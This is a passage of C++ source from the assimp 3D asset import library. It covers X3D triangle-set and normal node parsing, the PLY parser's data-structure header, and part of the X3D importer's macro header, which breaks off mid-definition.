ne = new CX3DImporter_NodeElement_Set(CX3DImporter_NodeElement::ENET_TriangleFanSet, NodeElement_Cur);
if(!def.empty()) ne->ID = def;
CX3DImporter_NodeElement_Set& ne_alias = *((CX3DImporter_NodeElement_Set*)ne);
ne_alias.CCW = ccw;
ne_alias.ColorPerVertex = colorPerVertex;
ne_alias.VertexCount = fanCount;
ne_alias.NormalPerVertex = normalPerVertex;
ne_alias.Solid = solid;
// create CoordIdx
size_t coord_num_first, coord_num_prev;
ne_alias.CoordIndex.clear();
// assign indices for first triangle
coord_num_first = 0;
coord_num_prev = 1;
for(std::list<int32_t>::const_iterator vc_it = ne_alias.VertexCount.begin(); vc_it != ne_alias.VertexCount.end(); vc_it++)
{
if(*vc_it < 3) throw DeadlyImportError("TriangleFanSet. fanCount shall be greater than or equal to three.");
for(int32_t vc = 2; vc < *vc_it; vc++)
{
if(ccw)
{
// 2 1
// 0
ne_alias.CoordIndex.push_back(static_cast<int32_t>(coord_num_first));// first vertex is a center and always is [0].
ne_alias.CoordIndex.push_back(static_cast<int32_t>(coord_num_prev++));
ne_alias.CoordIndex.push_back(static_cast<int32_t>(coord_num_prev));
}
else
{
// 1 2
// 0
ne_alias.CoordIndex.push_back(static_cast<int32_t>(coord_num_first));// first vertex is a center and always is [0].
ne_alias.CoordIndex.push_back(static_cast<int32_t>(coord_num_prev + 1));
ne_alias.CoordIndex.push_back(static_cast<int32_t>(coord_num_prev++));
}// if(ccw) else
ne_alias.CoordIndex.push_back(-1);// add face delimiter.
}// for(int32_t vc = 2; vc < *vc_it; vc++)
coord_num_prev++;// that index will be center of next fan
coord_num_first = coord_num_prev++;// forward to next point - second point of fan
}// for(std::list<int32_t>::const_iterator vc_it = ne_alias.VertexCount.begin(); vc_it != ne_alias.VertexCount.end(); vc_it++)
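// Worked example (illustrative): for fanCount="4" and ccw="true" the loop above emits
// CoordIndex = { 0, 1, 2, -1, 0, 2, 3, -1 }, i.e. every triangle of the fan shares vertex 0.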
// check for child nodes
if(!mReader->isEmptyElement())
{
ParseHelper_Node_Enter(ne);
MACRO_NODECHECK_LOOPBEGIN("TriangleFanSet");
// check for X3DComposedGeometryNodes
if(XML_CheckNode_NameEqual("Color")) { ParseNode_Rendering_Color(); continue; }
if(XML_CheckNode_NameEqual("ColorRGBA")) { ParseNode_Rendering_ColorRGBA(); continue; }
if(XML_CheckNode_NameEqual("Coordinate")) { ParseNode_Rendering_Coordinate(); continue; }
if(XML_CheckNode_NameEqual("Normal")) { ParseNode_Rendering_Normal(); continue; }
if(XML_CheckNode_NameEqual("TextureCoordinate")) { ParseNode_Texturing_TextureCoordinate(); continue; }
// check for X3DMetadataObject
if(!ParseHelper_CheckRead_X3DMetadataObject()) XML_CheckNode_SkipUnsupported("TriangleFanSet");
MACRO_NODECHECK_LOOPEND("TriangleFanSet");
ParseHelper_Node_Exit();
}// if(!mReader->isEmptyElement())
else
{
NodeElement_Cur->Child.push_back(ne);// add the created object as a child of the current element
}
NodeElement_List.push_back(ne);// add element to the node element list because it's a new object in the graph
}// if(!use.empty()) else
}
// <TriangleSet
// DEF="" ID
// USE="" IDREF
// ccw="true" SFBool [initializeOnly]
// colorPerVertex="true" SFBool [initializeOnly]
// normalPerVertex="true" SFBool [initializeOnly]
// solid="true" SFBool [initializeOnly]
// >
// <!-- ComposedGeometryContentModel -->
// ComposedGeometryContentModel is the child-node content model corresponding to X3DComposedGeometryNodes. It can contain Color (or ColorRGBA), Coordinate,
// Normal and TextureCoordinate, in any order. No more than one instance of these nodes is allowed. Multiple VertexAttribute (FloatVertexAttribute,
// Matrix3VertexAttribute, Matrix4VertexAttribute) nodes can also be contained.
// A ProtoInstance node (with the proper node type) can be substituted for any node in this content model.
// </TriangleSet>
void X3DImporter::ParseNode_Rendering_TriangleSet()
{
std::string use, def;
bool ccw = true;
bool colorPerVertex = true;
bool normalPerVertex = true;
bool solid = true;
CX3DImporter_NodeElement* ne( nullptr );
MACRO_ATTRREAD_LOOPBEG;
MACRO_ATTRREAD_CHECKUSEDEF_RET(def, use);
MACRO_ATTRREAD_CHECK_RET("ccw", ccw, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_RET("colorPerVertex", colorPerVertex, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_RET("normalPerVertex", normalPerVertex, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_RET("solid", solid, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_LOOPEND;
// if "USE" defined then find already defined element.
if(!use.empty())
{
MACRO_USE_CHECKANDAPPLY(def, use, ENET_TriangleSet, ne);
}
else
{
// create and if needed - define new geometry object.
ne = new CX3DImporter_NodeElement_Set(CX3DImporter_NodeElement::ENET_TriangleSet, NodeElement_Cur);
if(!def.empty()) ne->ID = def;
CX3DImporter_NodeElement_Set& ne_alias = *((CX3DImporter_NodeElement_Set*)ne);
ne_alias.CCW = ccw;
ne_alias.ColorPerVertex = colorPerVertex;
ne_alias.NormalPerVertex = normalPerVertex;
ne_alias.Solid = solid;
// check for child nodes
if(!mReader->isEmptyElement())
{
ParseHelper_Node_Enter(ne);
MACRO_NODECHECK_LOOPBEGIN("TriangleSet");
// check for X3DComposedGeometryNodes
if(XML_CheckNode_NameEqual("Color")) { ParseNode_Rendering_Color(); continue; }
if(XML_CheckNode_NameEqual("ColorRGBA")) { ParseNode_Rendering_ColorRGBA(); continue; }
if(XML_CheckNode_NameEqual("Coordinate")) { ParseNode_Rendering_Coordinate(); continue; }
if(XML_CheckNode_NameEqual("Normal")) { ParseNode_Rendering_Normal(); continue; }
if(XML_CheckNode_NameEqual("TextureCoordinate")) { ParseNode_Texturing_TextureCoordinate(); continue; }
// check for X3DMetadataObject
if(!ParseHelper_CheckRead_X3DMetadataObject()) XML_CheckNode_SkipUnsupported("TriangleSet");
MACRO_NODECHECK_LOOPEND("TriangleSet");
ParseHelper_Node_Exit();
}// if(!mReader->isEmptyElement())
else
{
NodeElement_Cur->Child.push_back(ne);// add the created object as a child of the current element
}
NodeElement_List.push_back(ne);// add element to the node element list because it's a new object in the graph
}// if(!use.empty()) else
}
// <TriangleStripSet
// DEF="" ID
// USE="" IDREF
// ccw="true" SFBool [initializeOnly]
// colorPerVertex="true" SFBool [initializeOnly]
// normalPerVertex="true" SFBool [initializeOnly]
// solid="true" SFBool [initializeOnly]
// stripCount="" MFInt32 [inputOutput]
// >
// <!-- ComposedGeometryContentModel -->
// ComposedGeometryContentModel is the child-node content model corresponding to X3DComposedGeometryNodes. It can contain Color (or ColorRGBA), Coordinate,
// Normal and TextureCoordinate, in any order. No more than one instance of these nodes is allowed. Multiple VertexAttribute (FloatVertexAttribute,
// Matrix3VertexAttribute, Matrix4VertexAttribute) nodes can also be contained.
// A ProtoInstance node (with the proper node type) can be substituted for any node in this content model.
// </TriangleStripSet>
void X3DImporter::ParseNode_Rendering_TriangleStripSet()
{
std::string use, def;
bool ccw = true;
bool colorPerVertex = true;
std::list<int32_t> stripCount;
bool normalPerVertex = true;
bool solid = true;
CX3DImporter_NodeElement* ne( nullptr );
MACRO_ATTRREAD_LOOPBEG;
MACRO_ATTRREAD_CHECKUSEDEF_RET(def, use);
MACRO_ATTRREAD_CHECK_RET("ccw", ccw, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_RET("colorPerVertex", colorPerVertex, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_REF("stripCount", stripCount, XML_ReadNode_GetAttrVal_AsListI32);
MACRO_ATTRREAD_CHECK_RET("normalPerVertex", normalPerVertex, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_RET("solid", solid, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_LOOPEND;
// if "USE" defined then find already defined element.
if(!use.empty())
{
MACRO_USE_CHECKANDAPPLY(def, use, ENET_TriangleStripSet, ne);
}
else
{
// check data
if(stripCount.size() == 0) throw DeadlyImportError("TriangleStripSet must contain a non-empty \"stripCount\" attribute.");
// create and if needed - define new geometry object.
ne = new CX3DImporter_NodeElement_Set(CX3DImporter_NodeElement::ENET_TriangleStripSet, NodeElement_Cur);
if(!def.empty()) ne->ID = def;
CX3DImporter_NodeElement_Set& ne_alias = *((CX3DImporter_NodeElement_Set*)ne);
ne_alias.CCW = ccw;
ne_alias.ColorPerVertex = colorPerVertex;
ne_alias.VertexCount = stripCount;
ne_alias.NormalPerVertex = normalPerVertex;
ne_alias.Solid = solid;
// create CoordIdx
size_t coord_num0, coord_num1, coord_num2;// indices of current triangle
bool odd_tri;// sequence of current triangle
size_t coord_num_sb;// index of first point of strip
ne_alias.CoordIndex.clear();
coord_num_sb = 0;
for(std::list<int32_t>::const_iterator vc_it = ne_alias.VertexCount.begin(); vc_it != ne_alias.VertexCount.end(); vc_it++)
{
if(*vc_it < 3) throw DeadlyImportError("TriangleStripSet. stripCount shall be greater than or equal to three.");
// set initial values for first triangle
coord_num0 = coord_num_sb;
coord_num1 = coord_num_sb + 1;
coord_num2 = coord_num_sb + 2;
odd_tri = true;
for(int32_t vc = 2; vc < *vc_it; vc++)
{
if(ccw)
{
// 0 2
// 1
ne_alias.CoordIndex.push_back(static_cast<int32_t>(coord_num0));
ne_alias.CoordIndex.push_back(static_cast<int32_t>(coord_num1));
ne_alias.CoordIndex.push_back(static_cast<int32_t>(coord_num2));
}
else
{
// 0 1
// 2
ne_alias.CoordIndex.push_back(static_cast<int32_t>(coord_num0));
ne_alias.CoordIndex.push_back(static_cast<int32_t>(coord_num2));
ne_alias.CoordIndex.push_back(static_cast<int32_t>(coord_num1));
}// if(ccw) else
ne_alias.CoordIndex.push_back(-1);// add face delimiter.
// prepare values for next triangle
if(odd_tri)
{
coord_num0 = coord_num2;
coord_num2++;
}
else
{
coord_num1 = coord_num2;
coord_num2 = coord_num1 + 1;
}
odd_tri = !odd_tri;
coord_num_sb = coord_num2;// that index will be start of next strip
}// for(int32_t vc = 2; vc < *vc_it; vc++)
}// for(std::list<int32_t>::const_iterator vc_it = ne_alias.VertexCount.begin(); vc_it != ne_alias.VertexCount.end(); vc_it++)
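// Worked example (illustrative): for stripCount="4" and ccw="true" the loop above emits
// CoordIndex = { 0, 1, 2, -1, 2, 1, 3, -1 }; the second triangle is re-ordered so the
// winding stays consistent along the strip.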
// check for child nodes
if(!mReader->isEmptyElement())
{
ParseHelper_Node_Enter(ne);
MACRO_NODECHECK_LOOPBEGIN("TriangleStripSet");
// check for X3DComposedGeometryNodes
if(XML_CheckNode_NameEqual("Color")) { ParseNode_Rendering_Color(); continue; }
if(XML_CheckNode_NameEqual("ColorRGBA")) { ParseNode_Rendering_ColorRGBA(); continue; }
if(XML_CheckNode_NameEqual("Coordinate")) { ParseNode_Rendering_Coordinate(); continue; }
if(XML_CheckNode_NameEqual("Normal")) { ParseNode_Rendering_Normal(); continue; }
if(XML_CheckNode_NameEqual("TextureCoordinate")) { ParseNode_Texturing_TextureCoordinate(); continue; }
// check for X3DMetadataObject
if(!ParseHelper_CheckRead_X3DMetadataObject()) XML_CheckNode_SkipUnsupported("TriangleStripSet");
MACRO_NODECHECK_LOOPEND("TriangleStripSet");
ParseHelper_Node_Exit();
}// if(!mReader->isEmptyElement())
else
{
NodeElement_Cur->Child.push_back(ne);// add the created object as a child of the current element
}
NodeElement_List.push_back(ne);// add element to the node element list because it's a new object in the graph
}// if(!use.empty()) else
}
// <Normal
// DEF="" ID
// USE="" IDREF
// vector="" MFVec3f [inputOutput]
// />
void X3DImporter::ParseNode_Rendering_Normal()
{
std::string use, def;
std::list<aiVector3D> vector;
CX3DImporter_NodeElement* ne;
MACRO_ATTRREAD_LOOPBEG;
MACRO_ATTRREAD_CHECKUSEDEF_RET(def, use);
MACRO_ATTRREAD_CHECK_REF("vector", vector, XML_ReadNode_GetAttrVal_AsListVec3f);
MACRO_ATTRREAD_LOOPEND;
// if "USE" defined then find already defined element.
if(!use.empty())
{
MACRO_USE_CHECKANDAPPLY(def, use, ENET_Normal, ne);
}
else
{
// create and if needed - define new geometry object.
ne = new CX3DImporter_NodeElement_Normal(NodeElement_Cur);
if(!def.empty()) ne->ID = def;
((CX3DImporter_NodeElement_Normal*)ne)->Value = vector;
// check for X3DMetadataObject children.
if(!mReader->isEmptyElement())
ParseNode_Metadata(ne, "Normal");
else
NodeElement_Cur->Child.push_back(ne);// add the created object as a child of the current element
NodeElement_List.push_back(ne);// add element to the node element list because it's a new object in the graph
}// if(!use.empty()) else
}
}// namespace Assimp
#endif // !ASSIMP_BUILD_NO_X3D_IMPORTER
<|start_filename|>assimp/code/PlyParser.h<|end_filename|>
/*
Open Asset Import Library (assimp)
----------------------------------------------------------------------
Copyright (c) 2006-2016, assimp team
All rights reserved.
Redistribution and use of this software in source and binary forms,
with or without modification, are permitted provided that the
following conditions are met:
* Redistributions of source code must retain the above
copyright notice, this list of conditions and the
following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the
following disclaimer in the documentation and/or other
materials provided with the distribution.
* Neither the name of the assimp team, nor the names of its
contributors may be used to endorse or promote products
derived from this software without specific prior
written permission of the assimp team.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
----------------------------------------------------------------------
*/
/** @file Defines the helper data structures for importing PLY files */
#ifndef AI_PLYFILEHELPER_H_INC
#define AI_PLYFILEHELPER_H_INC
#include "ParsingUtils.h"
#include <vector>
namespace Assimp
{
// http://local.wasp.uwa.edu.au/~pbourke/dataformats/ply/
// http://w3.impa.br/~lvelho/outgoing/sossai/old/ViHAP_D4.4.2_PLY_format_v1.1.pdf
// http://www.okino.com/conv/exp_ply.htm
namespace PLY
{
// ---------------------------------------------------------------------------------
/*
name type number of bytes
---------------------------------------
char character 1
uchar unsigned character 1
short short integer 2
ushort unsigned short integer 2
int integer 4
uint unsigned integer 4
float single-precision float 4
double double-precision float 8
int8
int16
uint8 ... forms are also used
*/
enum EDataType
{
EDT_Char = 0x0u,
EDT_UChar,
EDT_Short,
EDT_UShort,
EDT_Int,
EDT_UInt,
EDT_Float,
EDT_Double,
// Marks invalid entries
EDT_INVALID
};
// ---------------------------------------------------------------------------------
/** \brief Specifies semantics for PLY element properties
*
* Semantics define the usage of a property, e.g. x coordinate
*/
enum ESemantic
{
//! vertex position x coordinate
EST_XCoord = 0x0u,
//! vertex position y coordinate
EST_YCoord,
//! vertex position z coordinate
EST_ZCoord,
//! vertex normal x coordinate
EST_XNormal,
//! vertex normal y coordinate
EST_YNormal,
//! vertex normal z coordinate
EST_ZNormal,
//! u texture coordinate
EST_UTextureCoord,
//! v texture coordinate
EST_VTextureCoord,
//! vertex colors, red channel
EST_Red,
//! vertex colors, green channel
EST_Green,
//! vertex colors, blue channel
EST_Blue,
//! vertex colors, alpha channel
EST_Alpha,
//! vertex index list
EST_VertexIndex,
//! texture index
EST_TextureIndex,
//! texture coordinates (stored as element of a face)
EST_TextureCoordinates,
//! material index
EST_MaterialIndex,
//! ambient color, red channel
EST_AmbientRed,
//! ambient color, green channel
EST_AmbientGreen,
//! ambient color, blue channel
EST_AmbientBlue,
//! ambient color, alpha channel
EST_AmbientAlpha,
//! diffuse color, red channel
EST_DiffuseRed,
//! diffuse color, green channel
EST_DiffuseGreen,
//! diffuse color, blue channel
EST_DiffuseBlue,
//! diffuse color, alpha channel
EST_DiffuseAlpha,
//! specular color, red channel
EST_SpecularRed,
//! specular color, green channel
EST_SpecularGreen,
//! specular color, blue channel
EST_SpecularBlue,
//! specular color, alpha channel
EST_SpecularAlpha,
//! specular power for phong shading
EST_PhongPower,
//! opacity between 0 and 1
EST_Opacity,
//! Marks invalid entries
EST_INVALID
};
// ---------------------------------------------------------------------------------
/** \brief Specifies semantics for PLY elements
*
* Semantics define the usage of an element, e.g. vertex or material
*/
enum EElementSemantic
{
//! The element is a vertex
EEST_Vertex = 0x0u,
//! The element is a face description (index table)
EEST_Face,
//! The element is a tristrip description (index table)
EEST_TriStrip,
//! The element is an edge description (ignored)
EEST_Edge,
//! The element is a material description
EEST_Material,
//! Marks invalid entries
EEST_INVALID
};
// ---------------------------------------------------------------------------------
/** \brief Helper class for a property in a PLY file.
*
* This can e.g. be a part of the vertex declaration
*/
class Property
{
public:
//! Default constructor
Property()
: eType (EDT_Int),
Semantic(),
bIsList(false),
eFirstType(EDT_UChar)
{}
//! Data type of the property
EDataType eType;
//! Semantical meaning of the property
ESemantic Semantic;
//! If the semantic of the property could not be parsed,
//! this contains the semantic name as specified in the file
std::string szName;
//! Specifies whether the data type is a list where
//! the first element specifies the size of the list
bool bIsList;
EDataType eFirstType;
// -------------------------------------------------------------------
//! Parse a property from a string. The end of the
//! string is either '\n', '\r' or '\0'. Return value is false
//! if the input string is NOT a valid property (E.g. does
//! not start with the "property" keyword)
static bool ParseProperty (const char* pCur, const char** pCurOut,
Property* pOut);
// -------------------------------------------------------------------
//! Parse a data type from a string
static EDataType ParseDataType(const char* pCur,const char** pCurOut);
// -------------------------------------------------------------------
//! Parse a semantic from a string
static ESemantic ParseSemantic(const char* pCur,const char** pCurOut);
};
// ---------------------------------------------------------------------------------
/** \brief Helper class for an element in a PLY file.
*
* This can e.g. be the vertex declaration. Elements contain a
* well-defined number of properties.
*/
class Element
{
public:
//! Default constructor
Element()
: eSemantic (EEST_INVALID)
, NumOccur(0)
{}
//! List of properties assigned to the element
//! std::vector to support operator[]
std::vector<Property> alProperties;
//! Semantic of the element
EElementSemantic eSemantic;
//! If the semantic of the element could not be parsed,
//! this contains the semantic name as specified in the file
std::string szName;
//! How many times will the element occur?
unsigned int NumOccur;
// -------------------------------------------------------------------
//! Parse an element from a string.
//! The function will parse all properties contained in the
//! element, too.
static bool ParseElement (const char* pCur, const char** pCurOut,
Element* pOut);
// -------------------------------------------------------------------
//! Parse a semantic from a string
static EElementSemantic ParseSemantic(const char* pCur,
const char** pCurOut);
};
// ---------------------------------------------------------------------------------
/** \brief Instance of a property in a PLY file
*/
class PropertyInstance
{
public:
//! Default constructor
PropertyInstance ()
{}
union ValueUnion
{
//! uInt32 representation of the property. All
// uint types are automatically converted to uint32
uint32_t iUInt;
//! Int32 representation of the property. All
// int types are automatically converted to int32
int32_t iInt;
//! Float32 representation of the property
float fFloat;
//! Float64 representation of the property
double fDouble;
};
// -------------------------------------------------------------------
//! List of all values parsed. Contains only one value
// for non-list properties
std::vector<ValueUnion> avList;
// -------------------------------------------------------------------
//! Parse a property instance
static bool ParseInstance (const char* pCur,const char** pCurOut,
const Property* prop, PropertyInstance* p_pcOut);
// -------------------------------------------------------------------
//! Parse a property instance in binary format
static bool ParseInstanceBinary (const char* pCur,const char** pCurOut,
const Property* prop, PropertyInstance* p_pcOut,bool p_bBE);
// -------------------------------------------------------------------
//! Get the default value for a given data type
static ValueUnion DefaultValue(EDataType eType);
// -------------------------------------------------------------------
//! Parse a value
static bool ParseValue(const char* pCur,const char** pCurOut,
EDataType eType,ValueUnion* out);
// -------------------------------------------------------------------
//! Parse a binary value
static bool ParseValueBinary(const char* pCur,const char** pCurOut,
EDataType eType,ValueUnion* out,bool p_bBE);
// -------------------------------------------------------------------
//! Convert a property value to a given type TYPE
template <typename TYPE>
static TYPE ConvertTo(ValueUnion v, EDataType eType);
};
// ---------------------------------------------------------------------------------
/** \brief Class for an element instance in a PLY file
*/
class ElementInstance
{
public:
//! Default constructor
ElementInstance ()
{}
//! List of all parsed properties
std::vector< PropertyInstance > alProperties;
// -------------------------------------------------------------------
//! Parse an element instance
static bool ParseInstance (const char* pCur,const char** pCurOut,
const Element* pcElement, ElementInstance* p_pcOut);
// -------------------------------------------------------------------
//! Parse a binary element instance
static bool ParseInstanceBinary (const char* pCur,const char** pCurOut,
const Element* pcElement, ElementInstance* p_pcOut,bool p_bBE);
};
// ---------------------------------------------------------------------------------
/** \brief Class for an element instance list in a PLY file
*/
class ElementInstanceList
{
public:
//! Default constructor
ElementInstanceList ()
{}
//! List of all element instances
std::vector< ElementInstance > alInstances;
// -------------------------------------------------------------------
//! Parse an element instance list
static bool ParseInstanceList (const char* pCur,const char** pCurOut,
const Element* pcElement, ElementInstanceList* p_pcOut);
// -------------------------------------------------------------------
//! Parse a binary element instance list
static bool ParseInstanceListBinary (const char* pCur,const char** pCurOut,
const Element* pcElement, ElementInstanceList* p_pcOut,bool p_bBE);
};
// ---------------------------------------------------------------------------------
/** \brief Class to represent the document object model of an ASCII or binary
* (both little and big-endian) PLY file
*/
class DOM
{
public:
//! Default constructor
DOM()
{}
//! Contains all elements of the file format
std::vector<Element> alElements;
//! Contains the real data of each element's instance list
std::vector<ElementInstanceList> alElementData;
//! Parse the DOM for a PLY file. The input string is assumed
//! to be terminated with zero
static bool ParseInstance (const char* pCur,DOM* p_pcOut);
static bool ParseInstanceBinary (const char* pCur,
DOM* p_pcOut,bool p_bBE);
//! Skip all comment lines after this
static bool SkipComments (const char* pCur,const char** pCurOut);
private:
// -------------------------------------------------------------------
//! Handle the file header and read all element descriptions
bool ParseHeader (const char* pCur,const char** pCurOut, bool p_bBE);
// -------------------------------------------------------------------
//! Read in all element instance lists
bool ParseElementInstanceLists (const char* pCur,const char** pCurOut);
// -------------------------------------------------------------------
//! Read in all element instance lists for a binary file format
bool ParseElementInstanceListsBinary (const char* pCur,
const char** pCurOut,bool p_bBE);
};
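// Illustrative mapping sketch (assumed example file, not part of the parser): for an ASCII
// header such as
//
//   ply
//   format ascii 1.0
//   element vertex 8
//   property float x
//   property float y
//   property float z
//   element face 6
//   property list uchar int vertex_indices
//   end_header
//
// DOM::alElements receives two Element entries (EEST_Vertex with NumOccur == 8 and
// EEST_Face with NumOccur == 6), each holding the corresponding Property descriptions,
// and DOM::alElementData later receives one ElementInstanceList per element.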
// ---------------------------------------------------------------------------------
/** \brief Helper class to represent a loaded PLY face
*/
class Face
{
public:
Face()
: iMaterialIndex(0xFFFFFFFF)
{
// set all indices to zero by default
mIndices.resize(3,0);
}
public:
//! List of vertex indices
std::vector<unsigned int> mIndices;
//! Material index
unsigned int iMaterialIndex;
};
// ---------------------------------------------------------------------------------
template <typename TYPE>
inline TYPE PLY::PropertyInstance::ConvertTo(
PLY::PropertyInstance::ValueUnion v, PLY::EDataType eType)
{
switch (eType)
{
case EDT_Float:
return (TYPE)v.fFloat;
case EDT_Double:
return (TYPE)v.fDouble;
case EDT_UInt:
case EDT_UShort:
case EDT_UChar:
return (TYPE)v.iUInt;
case EDT_Int:
case EDT_Short:
case EDT_Char:
return (TYPE)v.iInt;
default: ;
};
return (TYPE)0;
}
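// Usage sketch (illustrative): read back a parsed value as the desired target type, e.g.
//   float x = PLY::PropertyInstance::ConvertTo<float>(inst.avList.front(), prop.eType);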
} // Namespace PLY
} // Namespace Assimp
#endif // !! include guard
<|start_filename|>assimp/code/X3DImporter_Macro.hpp<|end_filename|>
/*
Open Asset Import Library (assimp)
----------------------------------------------------------------------
Copyright (c) 2006-2016, assimp team
All rights reserved.
Redistribution and use of this software in source and binary forms,
with or without modification, are permitted provided that the
following conditions are met:
* Redistributions of source code must retain the above
copyright notice, this list of conditions and the
following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the
following disclaimer in the documentation and/or other
materials provided with the distribution.
* Neither the name of the assimp team, nor the names of its
contributors may be used to endorse or promote products
derived from this software without specific prior
written permission of the assimp team.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
----------------------------------------------------------------------
*/
/// \file X3DImporter_Macro.hpp
/// \brief Useful macro definitions.
/// \date 2015-2016
/// \author <EMAIL>
#ifndef X3DIMPORTER_MACRO_HPP_INCLUDED
#define X3DIMPORTER_MACRO_HPP_INCLUDED
/// \def MACRO_USE_CHECKANDAPPLY(pDEF, pUSE, pType, pNE)
/// Performs the standard checks when the attribute "USE" is defined.
/// \param [in] pDEF - string holding the "DEF" value.
/// \param [in] pUSE - string holding the "USE" value.
/// \param [in] pType - type of the element to find.
/// \param [out] pNE - pointer to the found node element.
#define MACRO_USE_CHECKANDAPPLY(pDEF, pUSE, pType, pNE) \
do { \
XML_CheckNode_MustBeEmpty(); \
if(!pDEF.empty()) Throw_DEF_And_USE(); \
if(!FindNodeElement(pUSE, CX3DImporter_NodeElement::pType, &pNE)) Throw_USE_NotFound(pUSE); \
\
NodeElement_Cur->Child.push_back(pNE);/* add found object as child to current element */ \
} while(false)
/// \def MACRO_ATTRREAD_LOOPBEG
/// Begin of the loop that reads attribute values.
#define MACRO_ATTRREAD_LOOPBEG \
for(int idx = 0, idx_end = mReader->getAttributeCount(); idx < idx_end; idx++) \
{ \
std::string an(mReader->getAttributeName(idx));
/// \def MACRO_ATTRREAD_LOOPEND
/// End of the loop that reads attribute values.
#define MACRO_ATTRREAD_LOOPEND \
Throw_IncorrectAttr(an); \
}
/// \def MACRO_ATTRREAD_CHECK_REF
/// Check the current attribute name; if it equals the requested name, read its value. The result is written to the output variable by reference.
/// If the value was read, "continue" is called.
/// \param [in] pAttrName - attribute name.
/// \param [out] pVarName - output variable name.
/// \param [in] pFunction - function that reads the attribute value and writes it to pVarName.
#define MACRO_ATTRREAD_CHECK_REF(pAttrName, pVarName, pFunction) \
if(an == pAttrName) \
{ \
pFunction(idx, pVarName); \
continue; \
}
/// \def MACRO_ATTRREAD_CHECK_RET
/// Check the current attribute name; if it equals the requested name, read its value. The result is written to the output variable using the return value of \ref pFunction.
/// If the value was read, "continue" is called.
/// \param [in] pAttrName - attribute name.
/// \param [out] pVarName - output variable name.
/// \param [in] pFunction - function that reads the attribute value and returns it (assigned to pVarName).
#define MACRO_ATTRREAD_CHECK_RET(pAttrName, pVarName, pFunction) \
if(an == pAttrName) \
{ \
pVarName = pFunction(idx); \
continue; \
}
/// \def MACRO_ATTRREAD_CHECKUSEDEF_RET
/// Compact variant for checking "USE" and "DEF". Also skips the attributes "bboxCenter", "bboxSize" and "containerField".
/// If a value was read, "continue" is called.
/// \param [out] pDEF_Var - output variable name for "DEF" value.
/// \param [out] pUSE_Var - output variable name for "USE" value.
#define MACRO_ATTRREAD_CHECKUSEDEF_RET(pDEF_Var, pUSE_Var) \
MACRO_ATTRREAD_CHECK_RET("DEF", pDEF_Var, mReader->getAttributeValue); \
MACRO_ATTRREAD_CHECK_RET("USE", pUSE_Var, mReader->getAttributeValue); \
if(an == "bboxCenter") continue; \
if(an == "bboxSize") continue; \
if(an == "containerField") continue; \
do {} while(false)
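// ---------------------------------------------------------------------------------
// Illustrative sketch (not part of the original header): the attribute-reading macros
// above are meant to be combined inside an element parser roughly as shown below.
// The variables 'def', 'use', 'solid' and the reader function are hypothetical
// placeholders, not code taken from the importer.
//
//   std::string def, use;
//   bool solid = true;
//   MACRO_ATTRREAD_LOOPBEG;
//       MACRO_ATTRREAD_CHECKUSEDEF_RET(def, use);
//       MACRO_ATTRREAD_CHECK_RET("solid", solid, XML_ReadNode_GetAttrVal_AsBool);
//   MACRO_ATTRREAD_LOOPEND;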
/// \def MACRO_NODECHECK_LOOPBEGIN(pNodeName)
/// Begin of the loop that parses child nodes. Do not add ';' at the end.
/// \param [in] pNodeName - current node name.
#define MACRO_NODECHECK_LOOPBEGIN(pNodeName) \
do { \
bool close_found = false; \
\
while(mReader->read()) \
{ \
if(mReader->getNodeType() == irr::io::EXN_ELEMENT) \
{
/// \def MACRO_NODECHECK_LOOPEND(pNodeName)
/// End of the loop that parses child nodes.
/// \param [in] pNodeName - current node name.
#define MACRO_NODECHECK_LOOPEND(pNodeName) \
}/* if(mReader->getNodeType() == irr::io::EXN_ELEMENT) */ \
else if(mReader->getNodeType() == irr::io::EXN_ELEMENT_END) \
{ \
if(XML_CheckNode_NameEqual(pNodeName)) \
{ \
close_found = true; \
\
break; \
} \
